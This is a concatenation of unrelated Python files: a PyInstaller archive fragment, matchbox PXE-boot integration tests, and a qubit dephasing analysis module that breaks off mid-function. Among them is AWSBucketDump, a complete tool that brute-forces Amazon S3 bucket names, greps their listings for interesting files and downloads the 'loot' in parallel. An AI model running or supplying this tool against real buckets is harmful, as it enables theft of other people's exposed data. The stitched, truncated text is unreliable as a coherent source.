ispkg = pynm == '__init__'
assert ext in ('.pyc', '.pyo')
self.toc[nm] = (ispkg, self.lib.tell())
f = open(entry[1], 'rb')
f.seek(8) # skip magic and timestamp
self.lib.write(f.read())
def save_toc(self, tocpos):
"""
Default - toc is a dict
Gets marshaled to self.lib
"""
marshal.dump(self.toc, self.lib)
def update_headers(self, tocpos):
"""
Default - MAGIC + Python's magic + tocpos
"""
self.lib.seek(self.start)
self.lib.write(self.MAGIC)
self.lib.write(self.pymagic)
self.lib.write(struct.pack('!i', tocpos))
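# Illustrative sketch (assumption, not original code): the on-disk layout that
# the Archive class above writes and reads back.
#
#   offset 0           : MAGIC          ('PYL\0', 4 bytes)
#   offset 4           : python magic   (imp.get_magic(), 4 bytes)
#   offset TOCPOS (8)  : TOC position   (struct '!i', 4 bytes)
#   offset HDRLEN (12) : marshaled code objects, one per entry
#   offset tocpos      : marshaled TOC dict {name: (ispkg, pos)}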
class ZlibArchive(Archive):
"""
ZlibArchive - an archive with compressed entries. Archive is read
from the executable created by PyInstaller.
"""
MAGIC = 'PYZ\0'
TOCPOS = 8
HDRLEN = Archive.HDRLEN + 5
TOCTMPLT = {}
LEVEL = 9
NO_COMPRESSION_LEVEL = 0
def __init__(self, path=None, offset=None, level=9):
if path is None:
offset = 0
elif offset is None:
for i in range(len(path) - 1, - 1, - 1):
if path[i] == '?':
try:
offset = int(path[i + 1:])
except ValueError:
# Just ignore any spurious "?" in the path
# (like in Windows UNC \\?\<path>).
continue
path = path[:i]
break
else:
offset = 0
# Zlib compression level.
self.LEVEL = level
Archive.__init__(self, path, offset)
# dynamic import so not imported if not needed
self._mod_zlib = None
if self.LEVEL > self.NO_COMPRESSION_LEVEL:
try:
self._mod_zlib = __import__('zlib')
except ImportError:
raise RuntimeError('zlib required but cannot be imported')
# TODO this attribute is deprecated and not used anymore.
self.crypted = 0
def extract(self, name):
(ispkg, pos, lngth) = self.toc.get(name, (0, None, 0))
if pos is None:
return None
self.lib.seek(self.start + pos)
obj = self.lib.read(lngth)
try:
obj = self._mod_zlib.decompress(obj)
except self._mod_zlib.error:
raise ImportError("PYZ entry '%s' failed to decompress" % name)
try:
co = marshal.loads(obj)
except EOFError:
raise ImportError("PYZ entry '%s' failed to unmarshal" % name)
return ispkg, co
def add(self, entry):
if self.os is None:
import os
self.os = os
nm = entry[0]
pth = entry[1]
base, ext = self.os.path.splitext(self.os.path.basename(pth))
ispkg = base == '__init__'
try:
txt = open(pth[:-1], 'rU').read() + '\n'
except (IOError, OSError):
try:
f = open(pth, 'rb')
f.seek(8) # skip magic and timestamp
bytecode = f.read()
marshal.loads(bytecode).co_filename # to make sure it's valid
obj = self._mod_zlib.compress(bytecode, self.LEVEL)
except (IOError, ValueError, EOFError, AttributeError):
raise ValueError("bad bytecode in %s and no source" % pth)
else:
txt = txt.replace('\r\n', '\n')
try:
import os
co = compile(txt, self.os.path.join(self.path, nm), 'exec')
except SyntaxError, e:
print "Syntax error in", pth[:-1]
print e.args
raise
obj = self._mod_zlib.compress(marshal.dumps(co), self.LEVEL)
self.toc[nm] = (ispkg, self.lib.tell(), len(obj))
self.lib.write(obj)
def update_headers(self, tocpos):
"""
add level
"""
Archive.update_headers(self, tocpos)
self.lib.write(struct.pack('!iB', self.LEVEL, self.crypted))
def checkmagic(self):
Archive.checkmagic(self)
self.LEVEL, self.crypted = struct.unpack('!iB', self.lib.read(5))
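# Illustrative sketch (assumption, not original code): a ZlibArchive entry is
# zlib-compressed marshaled bytecode, and its TOC value also carries a length,
# so extract() can read and decompress exactly one object:
#
#   toc[name] == (ispkg, pos, length)
#   obj = zlib.decompress(lib[start + pos : start + pos + length])
#   code = marshal.loads(obj)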
|
|
#!/usr/bin/env python
# AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot.
# It's similar to a subdomain bruteforcer but is made specifically for S3
# buckets and also has some extra features that allow you to grep for
# delicious files as well as download interesting files if you're not
# afraid to quickly fill up your hard drive.
# by Jordan Potti
# @ok_bye_now
from argparse import ArgumentParser
import codecs
import requests
import xmltodict
import sys
import os
import shutil
import traceback
from queue import Queue
from threading import Thread, Lock
bucket_q = Queue()
download_q = Queue()
grep_list=None
arguments = None
def fetch(url):
print('fetching ' + url)
response = requests.get(url)
if response.status_code == 403 or response.status_code == 404:
status403(url)
if response.status_code == 200:
if "Content" in response.text:
returnedList=status200(response,grep_list,url)
def bucket_worker():
while True:
item = bucket_q.get()
try:
fetch(item)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
bucket_q.task_done()
def downloadWorker():
print('download worker running')
while True:
item = download_q.get()
try:
downloadFile(item)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
download_q.task_done()
directory_lock = Lock()
def get_directory_lock():
directory_lock.acquire()
def release_directory_lock():
directory_lock.release()
def get_make_directory_return_filename_path(url):
global arguments
bits = url.split('/')
directory = arguments.savedir
for i in range(2,len(bits)-1):
directory = os.path.join(directory, bits[i])
try:
get_directory_lock()
if not os.path.isdir(directory):
os.makedirs(directory)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
finally:
release_directory_lock()
return os.path.join(directory, bits[-1]).rstrip()
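# Illustrative example (assumption, not original code) of the path mapping
# performed above, with arguments.savedir == 'loot':
#
#   url  = 'https://mybucket.s3.amazonaws.com/backups/db.sql'
#   bits = ['https:', '', 'mybucket.s3.amazonaws.com', 'backups', 'db.sql']
#   -> creates 'loot/mybucket.s3.amazonaws.com/backups' if missing
#   -> returns 'loot/mybucket.s3.amazonaws.com/backups/db.sql'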
interesting_file_lock = Lock()
def get_interesting_file_lock():
interesting_file_lock.acquire()
def release_interesting_file_lock():
interesting_file_lock.release()
def write_interesting_file(filepath):
try:
get_interesting_file_lock()
with open('interesting_file.txt', 'ab+') as interesting_file:
interesting_file.write(filepath.encode('utf-8'))
interesting_file.write('\n'.encode('utf-8'))
finally:
release_interesting_file_lock()
def downloadFile(filename):
global arguments
print('Downloading {}'.format(filename))
local_path = get_make_directory_return_filename_path(filename)
local_filename = (filename.split('/')[-1]).rstrip()
print('local {}'.format(local_path))
if local_filename =="":
print("Directory..\n")
else:
r = requests.get(filename.rstrip(), stream=True)
if 'Content-Length' in r.headers:
if int(r.headers['Content-Length']) > arguments.maxsize:
print("This file is greater than the specified max size.. skipping..\n")
else:
with open(local_path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
r.close()
def print_banner():
print('''\nDescription:
AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot.
It's similar to a subdomain bruteforcer but is made specifically for S3
buckets and also has some extra features that allow you to grep for
delicious files as well as download interesting files if you're not
afraid to quickly fill up your hard drive.
by Jordan Potti
@ok_bye_now'''
)
def cleanUp():
print("Cleaning Up Files")
def status403(line):
#print(line.rstrip() + " is not accessible")
return
def queue_up_download(filepath):
download_q.put(filepath)
print('Collectable: {}'.format(filepath))
write_interesting_file(filepath)
def status200(response,grep_list,line):
print("Pilfering "+line.rstrip())
objects=xmltodict.parse(response.text)
Keys = []
interest=[]
try:
for child in objects['ListBucketResult']['Contents']:
Keys.append(child['Key'])
except:
pass
hit = False
for words in Keys:
words = (str(words)).rstrip()
collectable = line+'/'+words
if grep_list is not None and len(grep_list) > 0:
for grep_line in grep_list:
grep_line = (str(grep_line)).rstrip()
if grep_line in words:
queue_up_download(collectable)
break
else:
queue_up_download(collectable)
def main():
global arguments
global grep_list
parser = ArgumentParser()
parser.add_argument("-D", dest="download", required=False, action="store_true", default=False, help="Download files. This requires significant diskspace")
parser.add_argument("-d", dest="savedir", required=False, default='', help="if -D, then -d 1 to create save directories for each bucket with results.")
parser.add_argument("-l", dest="hostlist", required=True, help="")
parser.add_argument("-g", dest="grepwords", required=False, help="Provide a wordlist to grep for")
parser.add_argument("-m", dest="maxsize", type=int, required=False, default=1024, help="Maximum file size to download.")
parser.add_argument("-t", dest="threads", type=int, required=False, default=1, help="thread count.")
if len(sys.argv) == 1:
print_banner()
parser.error("No arguments given.")
parser.print_usage()
sys.exit()
# output parsed arguments into a usable object
arguments = parser.parse_args()
# specify primary variables
# -g is optional, so only build a grep list when a wordlist was provided
if arguments.grepwords:
with open(arguments.grepwords, "r") as grep_file:
grep_content = grep_file.readlines()
grep_list = [g.strip() for g in grep_content]
if arguments.download and arguments.savedir:
print("Downloads enabled (-D), and save directories (-d) for each host will be created/used")
elif arguments.download and not arguments.savedir:
print("Downloads enabled (-D), and will be saved to current directory")
else:
print("Downloads were not enabled (-D), not saving results locally.")
# start up bucket workers
for i in range(0,arguments.threads):
print('starting thread')
t = Thread(target=bucket_worker)
t.daemon = True
t.start()
    # start download workers (same count as the bucket workers above)
    for i in range(0, arguments.threads):
t = Thread(target=downloadWorker)
t.daemon = True
t.start()
with open(arguments.hostlist) as f:
for line in f:
if len(line.rstrip()) < 1:
continue
bucket = 'https://'+line.rstrip()+'.s3.amazonaws.com'
print('queuing {}'.format(bucket))
bucket_q.put(bucket)
bucket = 'http://'+line.rstrip()+'.s3.amazonaws.com'
print('queuing {}'.format(bucket))
bucket_q.put(bucket)
bucket_q.join()
if arguments.download:
download_q.join()
cleanUp()
if __name__ == "__main__":
main()
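# Example invocation (the script and wordlist file names here are
# placeholders; the flags are the ones defined in main() above):
#
#   python AWSBucketDump.py -l hostlist.txt -g grepwords.txt -D -t 8 -m 500000
#
# -l supplies candidate bucket names, -g the substrings worth collecting,
# -D enables downloads (capped at -m bytes), and -t sets the thread count.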
|
|
import json
import os
from multiprocessing import Process
from unittest import TestCase
import requests
import sys
import time
from app import generator
# ec = configs.EnjoliverConfig(importer=__file__)
class IOErrorToWarning(object):
def __enter__(self):
generator.GenerateCommon._raise_enof = Warning
def __exit__(self, ext, exv, trb):
generator.GenerateCommon._raise_enof = IOError
class TestBootConfigCommon(TestCase):
p_matchbox = Process
gen = generator.Generator
func_path = "%s" % os.path.dirname(__file__)
tests_path = "%s" % os.path.split(func_path)[0]
app_path = os.path.split(tests_path)[0]
project_path = os.path.split(app_path)[0]
matchbox_path = "%s/matchbox" % project_path
assets_path = "%s/matchbox/assets" % project_path
runtime_path = "%s/runtime" % project_path
rkt_bin = "%s/rkt/rkt" % runtime_path
matchbox_bin = "%s/matchbox/matchbox" % runtime_path
test_matchbox_path = "%s/test_matchbox" % tests_path
matchbox_port = int(os.getenv("MATCHBOX_PORT", "8080"))
# matchbox_address = "0.0.0.0:%d" % matchbox_port
matchbox_endpoint = "http://localhost:%d" % matchbox_port
api_uri = "http://127.0.0.1:5000"
@staticmethod
def process_target():
os.environ["ENJOLIVER_MATCHBOX_PATH"] = TestBootConfigCommon.test_matchbox_path
os.environ["ENJOLIVER_MATCHBOX_ASSETS"] = TestBootConfigCommon.assets_path
cmd = [
"%s" % sys.executable,
"%s/manage.py" % TestBootConfigCommon.project_path,
"matchbox"
]
print("PID -> %s\n"
"exec -> %s\n" % (
os.getpid(), " ".join(cmd)))
sys.stdout.flush()
os.execve(cmd[0], cmd, os.environ)
@classmethod
def generator(cls):
marker = "%s" % cls.__name__.lower()
ignition_file = "inte-%s.yaml" % marker
try:
cls.gen = generator.Generator(
api_uri=cls.api_uri,
profile_id="id-%s" % marker,
name="name-%s" % marker,
ignition_id=ignition_file,
matchbox_path=cls.test_matchbox_path
)
except IOError:
print(
"\nWARNING %s override %s in %s\n" %
(cls.__name__,
generator.GenerateCommon._raise_enof,
Warning))
sys.stderr.flush()
with IOErrorToWarning():
cls.gen = generator.Generator(
api_uri=cls.api_uri,
profile_id="id-%s" % marker,
name="name-%s" % marker,
ignition_id=ignition_file,
matchbox_path=cls.test_matchbox_path
)
cls.gen.dumps()
@classmethod
def setUpClass(cls):
time.sleep(0.1)
cls.clean_sandbox()
if os.path.isfile("%s" % TestBootConfigCommon.matchbox_bin) is False:
raise IOError("%s" % TestBootConfigCommon.matchbox_bin)
cls.p_matchbox = Process(target=TestBootConfigCommon.process_target)
print("PPID -> %s\n" % os.getpid())
cls.p_matchbox.start()
assert cls.p_matchbox.is_alive() is True
cls.generator()
cls.matchbox_running(cls.matchbox_endpoint, cls.p_matchbox)
@classmethod
def tearDownClass(cls):
print("TERM -> %d\n" % cls.p_matchbox.pid)
sys.stdout.flush()
cls.p_matchbox.terminate()
cls.p_matchbox.join(timeout=5)
cls.clean_sandbox()
time.sleep(0.2)
@staticmethod
def clean_sandbox():
dirs = ["%s/%s" % (
TestBootConfigCommon.test_matchbox_path, k) for k in (
"profiles", "groups")]
for d in dirs:
for f in os.listdir(d):
if ".json" in f:
os.remove("%s/%s" % (d, f))
def setUp(self):
self.assertTrue(self.p_matchbox.is_alive())
try:
self.assertEqual(self.gen.group.api_uri, self.gen.profile.api_uri)
except AttributeError:
# gen not declared
pass
@staticmethod
def matchbox_running(matchbox_endpoint, p_matchbox):
response_body = ""
response_code = 404
for i in range(10):
assert p_matchbox.is_alive() is True
try:
request = requests.get(matchbox_endpoint)
response_body = request.content
response_code = request.status_code
request.close()
break
except requests.exceptions.ConnectionError:
pass
time.sleep(0.2)
assert b"matchbox\n" == response_body
assert 200 == response_code
def test_01_boot_dot_ipxe(self):
request = requests.get("%s/boot.ipxe" % self.matchbox_endpoint)
response = request.content
request.close()
self.assertEqual(
response,
b"#!ipxe\n"
b"chain ipxe?uuid=${uuid}&mac=${mac:hexhyp}&domain=${domain}&hostname=${hostname}&serial=${serial}\n")
def test_02_ipxe(self):
request = requests.get("%s/ipxe" % self.matchbox_endpoint)
response = request.content.decode()
request.close()
response = response.replace(" \n", "\n")
lines = response.split("\n")
lines = [k for k in lines if k]
shebang = lines[0]
self.assertEqual(shebang, "#!ipxe")
kernel = lines[1].split(" ")
kernel_expect = [
'kernel',
'%s/assets/coreos/serve/coreos_production_pxe.vmlinuz' % self.gen.profile.api_uri,
"console=ttyS0", "console=ttyS1",
'coreos.config.url=%s/ignition?uuid=${uuid}&mac=${net0/mac:hexhyp}' % self.gen.profile.api_uri,
'coreos.first_boot',
"coreos.oem.id=pxe"]
self.assertEqual(kernel, kernel_expect)
init_rd = lines[2].split(" ")
init_rd_expect = ['initrd',
'%s/assets/coreos/serve/coreos_production_pxe_image.cpio.gz' % self.gen.profile.api_uri]
self.assertEqual(init_rd, init_rd_expect)
boot = lines[3]
self.assertEqual(boot, "boot")
self.assertEqual(len(lines), 4)
def test_03_assets(self):
request = requests.get("%s/assets" % self.matchbox_endpoint)
request.close()
self.assertEqual(200, request.status_code)
def test_03_assets_coreos_serve_404(self):
r = requests.get("%s/assets/coreos/serve/404_request.not-here" % self.matchbox_endpoint)
self.assertEqual(404, r.status_code)
class TestBootConfigHelloWorld(TestBootConfigCommon):
def test_a0_ignition(self):
request = requests.get("%s/ignition" % self.matchbox_endpoint)
response = request.content
request.close()
ign_resp = json.loads(response.decode())
expect = {
u'networkd': {},
u'passwd': {},
u'systemd': {},
u'storage': {
u'files': [{
u'group': {},
u'user': {},
u'filesystem':
u'root',
u'path': u'/tmp/hello',
u'contents': {
u'source': u'data:,Hello%20World%0A',
u'verification': {}
},
u'mode': 420}
]
},
u'ignition': {u'version': u'2.0.0', u'config': {}}}
self.assertEqual(ign_resp, expect)
class TestBootConfigSelector(TestBootConfigCommon):
mac = "00:00:00:00:00:00"
@classmethod
def generator(cls):
marker = "%s" % cls.__name__.lower()
ignition_file = "inte-%s.yaml" % marker
cls.gen = generator.Generator(
api_uri=cls.api_uri,
profile_id="id-%s" % marker,
name="name-%s" % marker,
ignition_id=ignition_file,
selector={"mac": cls.mac},
matchbox_path=cls.test_matchbox_path
)
cls.gen.dumps()
def test_02_ipxe(self):
request = requests.get("%s/ipxe?mac=%s" % (self.matchbox_endpoint, self.mac))
response = request.content.decode()
request.close()
response = response.replace(" \n", "\n")
lines = response.split("\n")
lines = [k for k in lines if k]
shebang = lines[0]
self.assertEqual(shebang, "#!ipxe")
kernel = lines[1].split(" ")
kernel_expect = [
'kernel',
'%s/assets/coreos/serve/coreos_production_pxe.vmlinuz' % self.gen.profile.api_uri,
"console=ttyS0", "console=ttyS1",
'coreos.config.url=%s/ignition?uuid=${uuid}&mac=${net0/mac:hexhyp}' % self.gen.profile.api_uri,
'coreos.first_boot',
"coreos.oem.id=pxe"]
self.assertEqual(kernel, kernel_expect)
init_rd = lines[2].split(" ")
init_rd_expect = ['initrd',
'%s/assets/coreos/serve/coreos_production_pxe_image.cpio.gz' % self.gen.profile.api_uri]
self.assertEqual(init_rd, init_rd_expect)
boot = lines[3]
self.assertEqual(boot, "boot")
self.assertEqual(len(lines), 4)
def test_a1_ipxe_raise(self):
r = requests.get("%s/ipxe" % self.matchbox_endpoint)
self.assertEqual(404, r.status_code)
def test_a2_ipxe_raise(self):
r = requests.get("%s/ignition?mac=%s" % (self.matchbox_endpoint, "01:01:01:01:01:01"))
self.assertEqual(404, r.status_code)
def test_a0_ignition(self):
request = requests.get("%s/ignition?mac=%s" % (self.matchbox_endpoint, self.mac))
response = request.content
request.close()
ign_resp = json.loads(response.decode())
expect = {
u'networkd': {},
u'passwd': {},
u'systemd': {},
u'storage': {
u'files': [
{
u'group': {},
u'user': {},
u'filesystem': u'root',
u'path': u'/tmp/selector',
u'contents': {
u'source': u'data:,BySelector%0A', u'verification': {}
},
u'mode': 420}]
},
u'ignition': {u'version': u'2.0.0', u'config': {}}}
self.assertEqual(ign_resp, expect)
class TestBootConfigSelectors(TestBootConfigCommon):
mac_one = "00:00:00:00:00:01"
mac_two = "00:00:00:00:00:02"
mac_three = "00:00:00:00:00:03"
# @staticmethod
# def clean_sandbox():
# # Don't clean
# pass
@classmethod
def generator(cls):
marker_one = "%s-one" % cls.__name__.lower()
ignition_file = "inte-%s.yaml" % marker_one
gen_one = generator.Generator(
api_uri=cls.api_uri,
profile_id="id-%s" % marker_one,
name="name-%s" % marker_one,
ignition_id=ignition_file,
selector={"mac": cls.mac_one},
matchbox_path=cls.test_matchbox_path
)
gen_one.dumps()
marker_two = "%s-two" % cls.__name__.lower()
ignition_file = "inte-%s.yaml" % marker_two
gen_one = generator.Generator(
api_uri=cls.api_uri,
profile_id="id-%s" % marker_two,
name="name-%s" % marker_two,
ignition_id=ignition_file,
selector={"mac": cls.mac_two},
matchbox_path=cls.test_matchbox_path
)
gen_one.dumps()
marker_three = "%s-three" % cls.__name__.lower()
ignition_file = "inte-testbootconfigselectors-default.yaml"
gen_one = generator.Generator(
api_uri=cls.api_uri,
profile_id="id-%s" % marker_three,
name="name-%s" % marker_three,
ignition_id=ignition_file,
matchbox_path=cls.test_matchbox_path
)
gen_one.dumps()
def test_ignition_1(self):
request = requests.get("%s/ignition?mac=%s" % (self.matchbox_endpoint, self.mac_one))
response = request.content
request.close()
ign_resp = json.loads(response.decode())
expect = {
u'networkd': {},
u'passwd': {},
u'systemd': {},
u'storage': {
u'files': [
{
u'group': {},
u'user': {},
u'filesystem': u'root',
u'path': u'/tmp/selector',
u'contents': {
u'source': u'data:,BySelectorOne%0A', u'verification': {}
},
u'mode': 420}]
},
u'ignition': {u'version': u'2.0.0', u'config': {}}}
self.assertEqual(ign_resp, expect)
def test_ignition_2(self):
request = requests.get("%s/ignition?mac=%s" % (self.matchbox_endpoint, self.mac_two))
response = request.content
request.close()
ign_resp = json.loads(response.decode())
expect = {
u'networkd': {},
u'passwd': {},
u'systemd': {},
u'storage': {
u'files': [
{
u'group': {},
u'user': {},
u'filesystem': u'root',
u'path': u'/tmp/selector',
u'contents': {
u'source': u'data:,BySelectorTwo%0A', u'verification': {}
},
u'mode': 420}]
},
u'ignition': {u'version': u'2.0.0', u'config': {}}}
self.assertEqual(ign_resp, expect)
def test_ignition_3(self):
request = requests.get("%s/ignition?mac=%s" % (self.matchbox_endpoint, self.mac_three))
response = request.content
request.close()
ign_resp = json.loads(response.decode())
expect = {
u'networkd': {},
u'passwd': {},
u'systemd': {},
u'storage': {
u'files': [
{
u'group': {},
u'user': {},
u'filesystem': u'root',
u'path': u'/tmp/selector',
u'contents': {
u'source': u'data:,NoSelector%0A', u'verification': {}
},
u'mode': 420}]
},
u'ignition': {u'version': u'2.0.0', u'config': {}}}
self.assertEqual(ign_resp, expect)
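# These integration tests assume a matchbox binary at matchbox_bin and the
# matchbox assets tree (see TestBootConfigCommon above). Under that layout
# they can be run with the standard unittest runner, for example:
#
#   MATCHBOX_PORT=8080 python -m unittest -v <this test module>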
|
|
'''
Toolset to analyse measurement-induced Dephasing of qubits
Hacked together by Rene Vollmer
'''
import pycqed
from pycqed.analysis_v2.quantum_efficiency_analysis import DephasingAnalysisSweep
import pycqed.analysis_v2.base_analysis as ba
import numpy as np
from collections import OrderedDict
import copy
import datetime
import os
from pycqed.analysis import analysis_toolbox as a_tools
import numpy.ma
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
class CrossDephasingAnalysis(ba.BaseDataAnalysis):
'''
Analyses measurement-induced Dephasing of qubits.
options_dict options:
- The inherited options from BaseDataAnalysis
- The inherited options from DephasingAnalysis
'''
def __init__(self, qubit_labels: list,
t_start: str = None, t_stop: str = None,
label_pattern: str = 'ro_amp_sweep_dephasing_trgt_{TQ}_measured_{RQ}',
options_dict: dict = None,
extract_only: bool = False, auto: bool = True,
close_figs: bool = True, do_fitting: bool = True,
relative_contrast=False):
super().__init__(t_start=t_start, t_stop=t_stop,
label=label_pattern,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only)
self.label_pattern = label_pattern
self.qubit_labels = qubit_labels
self.ra = np.array([[None] * len(qubit_labels)] * len(qubit_labels))
d = copy.deepcopy(self.options_dict)
d['save_figs'] = False
for i, tq in enumerate(qubit_labels):
for j, rq in enumerate(qubit_labels):
label = label_pattern.replace('{TQ}', tq).replace('{RQ}', rq)
self.ra[i, j] = DephasingAnalysisSweep(
t_start=t_start,
t_stop=t_stop,
label=label, options_dict=d,
auto=False, extract_only=True)
#TODO: add option to use DephasingAnalysisSingleScans instead
if auto:
self.run_analysis()
def extract_data(self):
ts = []
for i, tq in enumerate(self.qubit_labels):
for j, rq in enumerate(self.qubit_labels):
ra = self.ra[i, j]
ra.extract_data()
ts.append(np.max(ra.raw_data_dict['datetime']))
youngest = np.max(ts)
youngest += datetime.timedelta(seconds=1)
self.raw_data_dict = OrderedDict()
self.raw_data_dict['datetime'] = [youngest]
self.raw_data_dict['timestamps'] = [youngest.strftime("%Y%m%d_%H%M%S")]
self.timestamps = [youngest.strftime("%Y%m%d_%H%M%S")]
f = '%s_measurement_cross_dephasing_analysis' % (youngest.strftime("%H%M%S"))
d = '%s' % (youngest.strftime("%Y%m%d"))
folder = os.path.join(a_tools.datadir, d, f)
self.raw_data_dict['folder'] = [folder]
self.options_dict['analysis_result_file'] = os.path.join(folder, f + '.hdf5')
def run_fitting(self):
qubit_labels = self.qubit_labels
self.fit_dicts = OrderedDict()
self.fit_res = OrderedDict()
self.fit_dicts['sigmas'] = np.array(
[[None] * len(qubit_labels)] * len(qubit_labels), dtype=float)
self.fit_dicts['sigmas_phase'] = np.array(
[[None] * len(qubit_labels)] * len(qubit_labels), dtype=float)
self.fit_dicts['sigmas_norm'] = np.array(
[[None] * len(qubit_labels)] * len(qubit_labels), dtype=float)
self.fit_dicts['deph_norm'] = np.array(
[[None] * len(qubit_labels)] * len(qubit_labels), dtype=float)
#self.fit_res['coherence_fit'] = np.array(
# [[None] * len(qubit_labels)] * len(qubit_labels), dtype=object)
for i, tq in enumerate(qubit_labels):
for j, rq in enumerate(qubit_labels):
ra = self.ra[i, j]
ra.run_analysis()
for i, tq in enumerate(qubit_labels):
c = self.ra[i, i].fit_res['coherence_phase_fit'].params['c'].value
for j, rq in enumerate(qubit_labels):
ra = self.ra[i, j]
df = ra.fit_res['coherence_fit']
dpf = ra.fit_res['coherence_phase_fit']
self.fit_res['coherence_fit_'+tq+'_'+rq] = df
self.fit_dicts['sigmas'][i, j] = df.params['sigma'].value
s = dpf.params['s'].value
self.fit_dicts['sigmas_phase'][i, j] = 1/(s*np.sqrt(-c))
self.fit_dicts['sigmas_norm'][i,:] = self.fit_dicts['sigmas'][i,:] / self.fit_dicts['sigmas'][i, i]
self.fit_dicts['deph_norm'][i,:] = self.fit_dicts['sigmas'][i, i] / self.fit_dicts['sigmas'][i,:]
def prepare_plots(self):
pt = '\n'
t = self.timestamps[0]
self.plot_dicts['sigmas'] = {
'plotfn': self.plot_labeled_2d,
'title': t,
'yvals': self.qubit_labels, 'ylabel': 'Targeted Qubit', 'yunit': '',
'xvals': self.qubit_labels, 'xlabel': 'Dephased Qubit', 'xunit': '',
'zvals': self.fit_dicts['sigmas'],
'zlabel': r'Dephasing Gauss width $\sigma$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
self.plot_dicts['sigmas_phase'] = {
'plotfn': self.plot_labeled_2d,
'title': 'Sigmas concluded from Phase' + pt + t,
'yvals': self.qubit_labels, 'ylabel': 'Targeted Qubit', 'yunit': '',
'xvals': self.qubit_labels, 'xlabel': 'Dephased Qubit', 'xunit': '',
'zvals': self.fit_dicts['sigmas_phase'],
'zlabel': r'Dephasing Gauss width $\bar{\sigma}$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
self.plot_dicts['sigmas_norm'] = {
'plotfn': self.plot_labeled_2d,
            'title': 'Normalized by targeted Qubit' + pt + t,
'yvals': self.qubit_labels, 'ylabel': 'Targeted Qubit', 'yunit': '',
'xvals': self.qubit_labels, 'xlabel': 'Dephased Qubit', 'xunit': '',
'zvals': self.fit_dicts['sigmas_norm'],
'zlabel': r'Normalized Dephasing Gauss width $\sigma$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
self.plot_dicts['deph_norm'] = {
'plotfn': self.plot_norm_matrix,
            'title': 'Normalized by targeted Qubit' + pt + t,
'yvals': self.qubit_labels, 'ylabel': 'Targeted Qubit', 'yunit': '',
'xvals': self.qubit_labels, 'xlabel': 'Dephased Qubit', 'xunit': '',
'zvals': self.fit_dicts['deph_norm'],
'zlabel': r'Normalized Inverse Dephasing Gauss width $\sigma^{-1}$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
for i, tq in enumerate(self.qubit_labels):
for j, rq in enumerate(self.qubit_labels):
ra = self.ra[i, j]
label = self.label_pattern.replace('{TQ}', tq)
label = label.replace('{RQ}', rq)
for p in ra.plot_dicts:
self.plot_dicts[p+label] = ra.plot_dicts[p]
self.plot_dicts[p+label]['ax_id'] = self.plot_dicts[p+label].get('ax_id', '')+label
t = self.plot_dicts[p+label].get('title', 'Coherence ')
t += '\n' + 'Target: '+tq+', Meas.: '+rq
#t += '\n' + label
self.plot_dicts[p+label]['title'] = t
def plot_labeled_2d(self, pdict, axs):
xl = pdict.get('xvals')
yl = pdict.get('yvals')
z = pdict.get('zvals')
xn = np.array(range(len(xl)))+0.5
yn = np.array(range(len(yl)))+0.5
pdict['xvals'] = xn
pdict['yvals'] = -yn
pdict['zrange'] = (0, np.max(z))
self.plot_colorxy(pdict=pdict, axs=axs)
axs.yaxis.set_ticklabels(yl)
axs.yaxis.set_ticks(-yn)
axs.xaxis.set_ticklabels(xl)
axs.xaxis.set_ticks(xn)
axs.cbar.set_label(pdict.get('zlabel', ''))
def plot_norm_matrix(self, pdict, axs):
fig = axs.figure
xl = pdict.get('xvals')
yl = pdict.get('yvals')
z = pdict.get('zvals')
xn = np.array(range(len(xl)))
yn = np.array(range(len(yl)))
diag_matrix = np.zeros_like(z, dtype=bool)
for i in range(len(diag_matrix)):
diag_matrix[i, i] = True
off_diagonal = numpy.ma.masked_array(z, diag_matrix)
        diagonal = numpy.ma.masked_array(z, ~diag_matrix)
# axins1 = inset_axes(parent_axes=axs,
# width="4%", # width = 10% of parent_bbox width
# height="45%", # height : 50%
# loc=2,
# bbox_to_anchor=(1.03, 0., 1, 1),
# bbox_transform=axs.transAxes,
# borderpad=0,
# )
pa = axs.imshow(diagonal, cmap='Reds', vmax=1, vmin=0.95)
#cba = fig.colorbar(pa, cax=axins1)
axins2 = inset_axes(parent_axes=axs,
width="4%", # width = 10% of parent_bbox width
height="100%", # height : 50%
loc=3,
bbox_to_anchor=(1.03, 0., 1, 1),
bbox_transform=axs.transAxes,
borderpad=0,
)
pb = axs.imshow(off_diagonal, cmap='Blues',
vmin=0, vmax=max(np.max(off_diagonal), 0.01))
cbb = fig.colorbar(pb, cax=axins2)
axs.yaxis.set_ticklabels(yl)
axs.yaxis.set_ticks(yn)
axs.xaxis.set_ticklabels(xl)
axs.xaxis.set_ticks(xn)
#axs.cbar.set_label(pdict.get('zlabel', ''))
def plot_double_matrix(self, pdict, axs):
fig = axs.figure
xl = pdict.get('xvals')
yl = pdict.get('yvals')
z = pdict.get('zvals')
xn = np.array(range(len(xl)))
yn = np.array(range(len(yl)))
diag_matrix = np.zeros_like(z, dtype=bool)
for i in range(len(diag_matrix)):
diag_matrix[i, i] = True
off_diagonal = numpy.ma.masked_array(z, diag_matrix)
        diagonal = numpy.ma.masked_array(z, ~diag_matrix)
axins1 = inset_axes(parent_axes=axs,
width="4%", # width = 10% of parent_bbox width
height="45%", # height : 50%
loc=2,
bbox_to_anchor=(1.03, 0., 1, 1),
bbox_transform=axs.transAxes,
borderpad=0,
)
pa = axs.imshow(diagonal, cmap='Reds', vmax=1,
vmin=min(np.min(diagonal), 0.99))
cba = fig.colorbar(pa, cax=axins1)
axins2 = inset_axes(parent_axes=axs,
width="4%", # width = 10% of parent_bbox width
height="100%", # height : 50%
loc=3,
bbox_to_anchor=(1.03, 0., 1, 1),
bbox_transform=axs.transAxes,
borderpad=0,
)
pb = axs.imshow(off_diagonal, cmap='Blues_r',
